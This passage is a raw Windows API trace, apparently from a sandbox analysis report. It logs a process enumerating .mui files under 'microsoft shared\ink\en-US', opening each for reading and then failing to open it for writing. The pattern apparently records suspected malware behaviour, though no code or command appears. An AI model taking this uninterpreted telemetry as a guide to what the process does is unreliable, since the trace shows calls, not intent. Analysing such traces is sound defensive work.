dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="micaut.dll.mui", cAlternateFileName="")) returned 1 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.916] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.916] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0098.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.916] AreFileApisANSI () returned 1 [0098.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui", lpUsedDefaultChar=0x0) returned 72 [0098.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0098.916] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.916] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0098.916] AreFileApisANSI () returned 1 [0098.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0098.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0098.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui") returned 72 [0098.916] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.916] GetFileType (hFile=0x418) returned 0x1 [0098.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0098.917] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.917] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.917] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.917] CloseHandle (hObject=0x418) returned 1 [0098.917] AreFileApisANSI () returned 1 [0098.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0098.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0098.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui") returned 72 [0098.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.917] GetLastError () returned 0x5 [0098.917] GetLastError () returned 0x5 [0098.918] SetLastError (dwErrCode=0x5) [0098.918] GetLastError () returned 0x5 [0098.918] SetLastError (dwErrCode=0x5) [0098.918] GetLastError () returned 0x5 [0098.918] SetLastError (dwErrCode=0x5) [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0098.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.918] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da8b116, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7d250300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="mip.exe.mui", cAlternateFileName="")) returned 1 [0098.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0098.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0098.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0098.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0098.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0098.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0098.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.919] AreFileApisANSI () returned 1 [0098.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui", lpUsedDefaultChar=0x0) returned 69 [0098.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0098.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0098.919] AreFileApisANSI () returned 1 [0098.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0098.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0098.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui") returned 69 [0098.919] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.919] GetFileType (hFile=0x418) returned 0x1 [0098.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0098.920] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.920] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.920] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.920] CloseHandle (hObject=0x418) returned 1 [0098.920] AreFileApisANSI () returned 1 [0098.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0098.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0098.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui") returned 69 [0098.920] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.921] GetLastError () returned 0x5 [0098.921] GetLastError () returned 0x5 [0098.921] SetLastError (dwErrCode=0x5) [0098.921] GetLastError () returned 0x5 [0098.921] SetLastError (dwErrCode=0x5) [0098.921] GetLastError () returned 0x5 [0098.921] SetLastError (dwErrCode=0x5) [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0098.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.921] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da18a06, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x80b88a00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="mshwLatin.dll.mui", cAlternateFileName="")) returned 1 [0098.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0098.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0098.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0098.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0098.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0098.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0098.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0098.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0098.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0098.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0098.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0098.922] AreFileApisANSI () returned 1 [0098.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui", lpUsedDefaultChar=0x0) returned 75 [0098.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0098.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.922] AreFileApisANSI () returned 1 [0098.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0098.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x853a0 [0098.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x853a0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui") returned 75 [0098.923] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.923] GetFileType (hFile=0x418) returned 0x1 [0098.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x853a0 | out: hHeap=0x20000) returned 1 [0098.923] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.923] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.923] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.923] CloseHandle (hObject=0x418) returned 1 [0098.924] AreFileApisANSI () returned 1 [0098.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0098.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85120 [0098.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui") returned 75 [0098.924] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.924] GetLastError () returned 0x5 [0098.924] GetLastError () returned 0x5 [0098.924] SetLastError (dwErrCode=0x5) [0098.924] GetLastError () returned 0x5 [0098.924] SetLastError (dwErrCode=0x5) [0098.924] GetLastError () returned 0x5 [0098.924] SetLastError (dwErrCode=0x5) [0098.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0098.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0098.924] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.924] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.924] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dab1374, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7e563000, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x327f590, 